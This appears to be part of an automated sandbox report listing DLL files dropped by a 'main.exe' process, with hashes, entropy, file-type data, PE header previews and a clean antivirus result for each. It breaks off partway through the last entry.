                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):17920
                                                                                                                                                                                                                                                      Entropy (8bit):5.293810509074883
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:4PHoDUntQjNB+/yw/pogeXOvXoTezczOo3p9iJgDQ3iNgnVbwhA:dUOhBcDRogeXOfoTezcio3pUJgDQ3i+
                                                                                                                                                                                                                                                      MD5:78AEF441C9152A17DD4DC40C7CC9DF69
                                                                                                                                                                                                                                                      SHA1:6BB6F8426AFA6522E647DFC82B1B64FAF3A9781F
                                                                                                                                                                                                                                                      SHA-256:56E4E4B156295F1AAA22ECB5481841DE2A9EB84845A16E12A7C18C7C3B05B707
                                                                                                                                                                                                                                                      SHA-512:27B27E77BE81B29D42359FE28531225383860BCD19A79044090C4EA58D9F98009A254BF63585979C60B3134D47B8233941ABB354A291F23C8641A4961FA33107
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...Y..f.........." .....(... ......P.....................................................`.........................................pI......lJ..d....p.......`..................(....A...............................A..8............@...............................text....'.......(.................. ..`.rdata.......@.......,..............@..@.data........P.......<..............@....pdata.......`.......>..............@..@.rsrc........p.......B..............@..@.reloc..(............D..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):11776
                                                                                                                                                                                                                                                      Entropy (8bit):4.862619033406922
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:0Ga+F/1NtJ9t4udqaj01rlALnNNJSS2sP+YEdMN+F9FdKaWDULk+VOmWbucX6gR7:PF/1n7Guqaj0ktfEON+bMDUlJcqg0Gd
                                                                                                                                                                                                                                                      MD5:19E0ABF76B274C12FF624A16713F4999
                                                                                                                                                                                                                                                      SHA1:A4B370F556B925F7126BF87F70263D1705C3A0DB
                                                                                                                                                                                                                                                      SHA-256:D9FDA05AE16C5387AB46DC728C6EDCE6A3D0A9E1ABDD7ACB8B32FC2A17BE6F13
                                                                                                                                                                                                                                                      SHA-512:D03033EA5CF37641FBD802EBEB5019CAEF33C9A78E01519FEA88F87E773DCA92C80B74BA80429B530694DAD0BFA3F043A7104234C7C961E18D48019D90277C8E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d...Y..f.........." ................P.....................................................`..........................................8.......8..d....`.......P..X............p..(....1...............................1..8............0...............................text............................... ..`.rdata.......0......................@..@.data...H....@.......$..............@....pdata..X....P.......&..............@..@.rsrc........`.......*..............@..@.reloc..(....p.......,..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):14336
                                                                                                                                                                                                                                                      Entropy (8bit):5.227045547076371
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:saF/1n7Guqaj0ktrE8o2o+V2rQnjt1wmg9jtveDn4clG6VcqgOvgdd:swGXkFE8Zo+AojO9jZeDf5rgOvgz
                                                                                                                                                                                                                                                      MD5:309D6F6B0DD022EBD9214F445CAC7BB9
                                                                                                                                                                                                                                                      SHA1:ABD22690B7AD77782CFC0D2393D0C038E16070B0
                                                                                                                                                                                                                                                      SHA-256:4FBE188C20FB578D4B66349D50AA6FFE4AB86844FB6427C57738F36780D1E2E2
                                                                                                                                                                                                                                                      SHA-512:D1951FE92F83E7774E8E877815BED6E6216D56EF18B7F1C369D678CB6E1814243659E9FA7ABC0D22FB5B34A9D50A51D5A89BA00AE1FDD32157FD0FF9902FB4B7
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d...U..f.........." ................P.....................................................`..........................................8.......9..d....`.......P..@............p..(....2...............................2..8............0...............................text...x........................... ..`.rdata.......0....... ..............@..@.data...H....@......................@....pdata..@....P.......0..............@..@.rsrc........`.......4..............@..@.reloc..(....p.......6..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):13824
                                                                                                                                                                                                                                                      Entropy (8bit):5.176369829782773
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:rF/1n7Guqaj0ktrESsrUW+SBjsK5tcQmEreD2mf1AoxkVcqgOvgXQ:rGXkFE/UW575tA2eDp1Ao2rgOvgX
                                                                                                                                                                                                                                                      MD5:D54FEB9A270B212B0CCB1937C660678A
                                                                                                                                                                                                                                                      SHA1:224259E5B684C7AC8D79464E51503D302390C5C9
                                                                                                                                                                                                                                                      SHA-256:032B83F1003A796465255D9B246050A196488BAC1260F628913E536314AFDED4
                                                                                                                                                                                                                                                      SHA-512:29955A6569CA6D039B35BB40C56AEEB75FC765600525D0B469F72C97945970A428951BAB4AF9CD21B3161D5BBA932F853778E2674CA83B14F7ABA009FA53566F
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d...U..f.........." ................P.....................................................`..........................................8.......9..d....`.......P..@............p..(....2...............................2..8............0...............................text...h........................... ..`.rdata.......0......................@..@.data...H....@.......,..............@....pdata..@....P......................@..@.rsrc........`.......2..............@..@.reloc..(....p.......4..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):14336
                                                                                                                                                                                                                                                      Entropy (8bit):5.047563322651927
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:6alCvH32p3/2pnEhKnLg9yH8puzoFaPERIQAvHD9CIg5kP:5CvHmp3OpnEhmLg9yH8puzoFaPERIQgI
                                                                                                                                                                                                                                                      MD5:52DCD4151A9177CF685BE4DF48EA9606
                                                                                                                                                                                                                                                      SHA1:F444A4A5CBAE9422B408420115F0D3FF973C9705
                                                                                                                                                                                                                                                      SHA-256:D54375DC0652358A6E4E744F1A0EAEEAD87ACCD391A20D6FF324FE14E988A122
                                                                                                                                                                                                                                                      SHA-512:64C54B89F2637759309ECC6655831C3A6755924ED70CBC51614061542EB9BA9A8AECF6951EB3AB92447247DC4D7D846C88F4957DBBE4484A9AB934343EE27178
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...Q..f.........." ......... ......P.....................................................`.........................................@9.......9..d....`.......P..(............p..(....2...............................2..8............0...............................text...X........................... ..`.rdata..@....0......................@..@.data...x....@......................@....pdata..(....P.......0..............@..@.rsrc........`.......4..............@..@.reloc..(....p.......6..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):13824
                                                                                                                                                                                                                                                      Entropy (8bit):5.09893680790018
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:xsiXeqVb0lwbH4P01sAD7I/9hAkwDWzBEbcqgqLg:valqH4M1sAD7KvpwDFtgqLg
                                                                                                                                                                                                                                                      MD5:F929B1A3997427191E07CF52AC883054
                                                                                                                                                                                                                                                      SHA1:C5EA5B68586C2FB09E5FDD20D4DD616D06F5CBA6
                                                                                                                                                                                                                                                      SHA-256:5386908173074FABD95BF269A9DF0A4E1B21C0576923186F449ABF4A820F6A8E
                                                                                                                                                                                                                                                      SHA-512:2C79DBCE2C21214D979AB86DD989D41A3AFA7FCB7F3B79BA9974E2EE8F832DD7CA20C1C87C0C380DB037D776FE6D0851D60AD55A08AFDE0003B7E59214DD2F3B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...R..f.........." ................P.....................................................`.........................................08.......8..d....`.......P..(............p..(....1...............................2..8............0...............................text............................... ..`.rdata..0....0......................@..@.data........@.......,..............@....pdata..(....P......................@..@.rsrc........`.......2..............@..@.reloc..(....p.......4..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):15360
                                                                                                                                                                                                                                                      Entropy (8bit):5.451865349855574
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:KfwogDHER1wuiDSyoGTgDZOviNgEPrLg:ugDHELwuiDScTgDwi+EP
                                                                                                                                                                                                                                                      MD5:1FA5E257A85D16E916E9C22984412871
                                                                                                                                                                                                                                                      SHA1:1AC8EE98AD0A715A1B40AD25D2E8007CDC19871F
                                                                                                                                                                                                                                                      SHA-256:D87A9B7CAD4C451D916B399B19298DC46AAACC085833C0793092641C00334B8E
                                                                                                                                                                                                                                                      SHA-512:E4205355B647C6E28B7E4722328F51DC2EB3A109E9D9B90F7C53D7A80A5A4B10E40ABDDAB1BA151E73EF3EB56941F843535663F42DCE264830E6E17BB659EADF
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...R..f.........." ..... ..........P.....................................................`..........................................8......`9..d....`.......P..X............p..(....1...............................1..8............0...............................text............ .................. ..`.rdata.......0.......$..............@..@.data........@.......2..............@....pdata..X....P.......4..............@..@.rsrc........`.......8..............@..@.reloc..(....p.......:..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):13824
                                                                                                                                                                                                                                                      Entropy (8bit):5.104245335186531
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:3F/1n7Guqaj0kt7/Ev9kt0Qwac6QzD8iD0QocqgI4G0S:nGXkd/EvGt9wacNDvAgI4v
                                                                                                                                                                                                                                                      MD5:FAD578A026F280C1AE6F787B1FA30129
                                                                                                                                                                                                                                                      SHA1:9A3E93818A104314E172A304C3D117B6A66BEB55
                                                                                                                                                                                                                                                      SHA-256:74A1FF0801F4704158684267CD8E123F83FB6334FE522C1890AC4A0926F80AB1
                                                                                                                                                                                                                                                      SHA-512:ACF8F5B382F3B4C07386505BBDCAF625D13BCC10AA93ED641833E3548261B0AD1063E2F59BE2FCD2AFAF3D315CB3FC5EB629CEFC168B33CFD65A3A6F1120F7FF
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d...U..f.........." ......... ......P.....................................................`..........................................9.......:..d....`.......P...............p..(...@3..............................`3..8............0...............................text...H........................... ..`.rdata.......0......................@..@.data...H....@.......,..............@....pdata.......P......................@..@.rsrc........`.......2..............@..@.reloc..(....p.......4..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):17920
                                                                                                                                                                                                                                                      Entropy (8bit):5.671305741258107
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:APHoDUntQj0sKhDOJ+0QPSfu6rofDjiZzgE+kbwb:VUOYsKNO466DjoUE+
                                                                                                                                                                                                                                                      MD5:556E6D0E5F8E4DA74C2780481105D543
                                                                                                                                                                                                                                                      SHA1:7A49CDEF738E9FE9CD6CD62B0F74EAD1A1774A33
                                                                                                                                                                                                                                                      SHA-256:247B0885CF83375211861F37B6DD1376AED5131D621EE0137A60FE7910E40F8B
                                                                                                                                                                                                                                                      SHA-512:28FA0CE6BDBCC5E95B80AADC284C12658EF0C2BE63421AF5627776A55050EE0EA0345E30A15B744FC2B2F5B1B1BBB61E4881F27F6E3E863EBAAEED1073F4CDA1
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...R..f.........." .....*..........P.....................................................`..........................................H......hI..d....p.......`..X...............(....A...............................A..8............@...............................text....).......*.................. ..`.rdata.......@......................@..@.data........P.......<..............@....pdata..X....`.......>..............@..@.rsrc........p.......B..............@..@.reloc..(............D..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):21504
                                                                                                                                                                                                                                                      Entropy (8bit):5.878701941774916
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:EJWo4IRCGHX1KXqHGcvYHp5RYcARQOj4MSTjqgPmJD1OhgkxEv:EcIRnHX1P/YtswvaD1Rk
                                                                                                                                                                                                                                                      MD5:2F2655A7BBFE08D43013EDDA27E77904
                                                                                                                                                                                                                                                      SHA1:33D51B6C423E094BE3E34E5621E175329A0C0914
                                                                                                                                                                                                                                                      SHA-256:C734ABBD95EC120CB315C43021C0E1EB1BF2295AF9F1C24587334C3FCE4A5BE1
                                                                                                                                                                                                                                                      SHA-512:8AF99ACC969B0E560022F75A0CDCAA85D0BDEADADEACD59DD0C4500F94A5843EA0D4107789C1A613181B1F4E5252134A485EF6B1D9D83CDB5676C5FEE4D49B90
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...S..f.........." .....6... ......P.....................................................`.........................................@Z......([..d............p..................(....R...............................R..8............P...............................text....5.......6.................. ..`.rdata..x....P.......:..............@..@.data........`.......J..............@....pdata.......p.......L..............@..@.rsrc................P..............@..@.reloc..(............R..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):21504
                                                                                                                                                                                                                                                      Entropy (8bit):5.881781476285865
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:EJWo4IRCGHXfKXqHGcvYHp5RYcARQOj4MSTjqgPmJD12gkxEv:EcIRnHXfP/YtswvaD1zk
                                                                                                                                                                                                                                                      MD5:CDE035B8AB3D046B1CE37EEE7EE91FA0
                                                                                                                                                                                                                                                      SHA1:4298B62ED67C8D4F731D1B33E68D7DC9A58487FF
                                                                                                                                                                                                                                                      SHA-256:16BEA322D994A553B293A724B57293D57DA62BC7EAF41F287956B306C13FD972
                                                                                                                                                                                                                                                      SHA-512:C44FDEE5A210459CE4557351E56B2D357FD4937F8EC8EACEAB842FEE29761F66C2262FCBAAC837F39C859C67FA0E23D13E0F60B3AE59BE29EB9D8ABAB0A572BB
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...S..f.........." .....6... ......P.....................................................`.........................................@Z......([..d............p..................(....R...............................R..8............P...............................text....5.......6.................. ..`.rdata..x....P.......:..............@..@.data........`.......J..............@....pdata.......p.......L..............@..@.rsrc................P..............@..@.reloc..(............R..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):26624
                                                                                                                                                                                                                                                      Entropy (8bit):5.837887867708438
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:768:e839Cc4itui0gel9soFdkO66MlPGXmXcyYDTzks:Ns4u/FZ6nPxMLDvk
                                                                                                                                                                                                                                                      MD5:999D431197D7E06A30E0810F1F910B9A
                                                                                                                                                                                                                                                      SHA1:9BFF781221BCFFD8E55485A08627EC2A37363C96
                                                                                                                                                                                                                                                      SHA-256:AB242B9C9FB662C6F7CB57F7648F33983D6FA3BB0683C5D4329EC2CC51E8C875
                                                                                                                                                                                                                                                      SHA-512:A5DD92DD471ADB44EEFE5919EF9CA3978724E21174DF5B3A9C1F0AB462F928E5A46A460D02417DB7522F5DE3BFEED5EEE6B1EAFAF3E621722E85E72675F7096F
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...T..f.........." .....H..."......P.....................................................`..........................................k.......l..d...............................(...pd...............................d..8............`...............................text....F.......H.................. ..`.rdata.......`.......L..............@..@.data................^..............@....pdata...............`..............@..@.rsrc................d..............@..@.reloc..(............f..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):26624
                                                                                                                                                                                                                                                      Entropy (8bit):5.895310340516013
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:768:lcX9Nf4ttui0gel9soFdkO66MlPGXmXc/vDTOvk:a38u/FZ6nPxM3DAk
                                                                                                                                                                                                                                                      MD5:0931ABBF3AED459B1A2138B551B1D3BB
                                                                                                                                                                                                                                                      SHA1:9EC0296DDAF574A89766A2EC035FC30073863AB0
                                                                                                                                                                                                                                                      SHA-256:1729A0DC6B80CB7A3C07372B98B10D3C6C613EA645240878E1FDE6A992FA06F1
                                                                                                                                                                                                                                                      SHA-512:9F970BB4D10B94F525DDDDE307C7DA5E672BBFB3A3866A34B89B56ADA99476724FD690A4396857182749294F67F36DB471A048789FB715D2A7DAF46917FC1947
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...T..f.........." .....H..."......P.....................................................`.........................................@l......(m..d...............................(....d...............................e..8............`...............................text...hG.......H.................. ..`.rdata..x....`.......L..............@..@.data................^..............@....pdata...............`..............@..@.rsrc................d..............@..@.reloc..(............f..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):12800
                                                                                                                                                                                                                                                      Entropy (8bit):4.967737129255606
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:dMpWt/1nCuqaL0kt7TsEx2fiTgDZqGF0T7cqgkLgJ:k/k1Ts64DDJyBgkLg
                                                                                                                                                                                                                                                      MD5:5F057A380BACBA4EF59C0611549C0E02
                                                                                                                                                                                                                                                      SHA1:4B758D18372D71F0AA38075F073722A55B897F71
                                                                                                                                                                                                                                                      SHA-256:BCB14DAC6C87C24269D3E60C46B49EFFB1360F714C353318F5BBAA48C79EC290
                                                                                                                                                                                                                                                      SHA-512:E1C99E224745B86EE55822C1DBCB4555A11EC31B72D87B46514917EB61E0258A1C6D38C4F592969C17EB4F0F74DA04BCECA31CF1622720E95F0F20E9631792E8
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r^J.6?$.6?$.6?$.?G..2?$.dJ%.4?$.}G%.5?$.6?%..?$.dJ!.<?$.dJ .>?$.dJ'.5?$..J,.7?$..J$.7?$..J..7?$..J&.7?$.Rich6?$.........................PE..d...V..f.........." ................P.....................................................`.........................................P8.......8..d....`.......P...............p..(....1...............................1..8............0...............................text............................... ..`.rdata..2....0......................@..@.data...H....@.......(..............@....pdata.......P.......*..............@..@.rsrc........`......................@..@.reloc..(....p.......0..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):13312
                                                                                                                                                                                                                                                      Entropy (8bit):5.007867576025166
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:bMt/1nCuqaL0ktPH0T7fwtF4zDn2rGacqgRGd:1/kpU3Yv4zDXqgRGd
                                                                                                                                                                                                                                                      MD5:49BCA1B7DF076D1A550EE1B7ED3BD997
                                                                                                                                                                                                                                                      SHA1:47609C7102F5B1BCA16C6BAD4AE22CE0B8AEE9E9
                                                                                                                                                                                                                                                      SHA-256:49E15461DCB76690139E71E9359F7FCF92269DCCA78E3BFE9ACB90C6271080B2
                                                                                                                                                                                                                                                      SHA-512:8574D7FA133B72A4A8D1D7D9FDB61053BC88C2D238B7AC7D519BE19972B658C44EA1DE433885E3206927C75DD5D1028F74999E048AB73189585B87630F865466
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.:...:...:...3.j.>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...........................PE..d...V..f.........." ................P.....................................................`..........................................8.......8..d....`.......P..X............p..(....1...............................1..8............0...............................text............................... ..`.rdata.......0......................@..@.data...H....@.......*..............@....pdata..X....P.......,..............@..@.rsrc........`.......0..............@..@.reloc..(....p.......2..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):15872
                                                                                                                                                                                                                                                      Entropy (8bit):5.226023387740053
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:rfRKTN+HLjRskTdf4WazSTkwjEvuY2bylHDiYIgovg:mcHfRl5pauoSjy5DiE
                                                                                                                                                                                                                                                      MD5:CB5CFDD4241060E99118DEEC6C931CCC
                                                                                                                                                                                                                                                      SHA1:1E7FED96CF26C9F4730A4621CA9D18CECE3E0BCE
                                                                                                                                                                                                                                                      SHA-256:A8F809B6A417AF99B75EEEEA3ECD16BDA153CBDA4FFAB6E35CE1E8C884D899C4
                                                                                                                                                                                                                                                      SHA-512:8A89E3563C14B81353D251F9F019D8CBF07CB98F78452B8522413C7478A0D77B9ABF2134E4438145D6363CDA39721D2BAE8AD13D1CDACCBB5026619D95F931CF
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...U..f.........." ..... ... ......P.....................................................`..........................................9.......9..d....`.......P..X............p..(...p2...............................2..8............0...............................text............ .................. ..`.rdata..@....0.......$..............@..@.data........@.......4..............@....pdata..X....P.......6..............@..@.rsrc........`.......:..............@..@.reloc..(....p.......<..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):14848
                                                                                                                                                                                                                                                      Entropy (8bit):5.262055670423592
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:C/ZN2eq/b04PAHH41F6fnVS0sVn+5CA5Z1cD66WGcqgFjLg:vI4IHHaQfSVnCZyDImgFjLg
                                                                                                                                                                                                                                                      MD5:18D2D96980802189B23893820714DA90
                                                                                                                                                                                                                                                      SHA1:5DEE494D25EB79038CBC2803163E2EF69E68274C
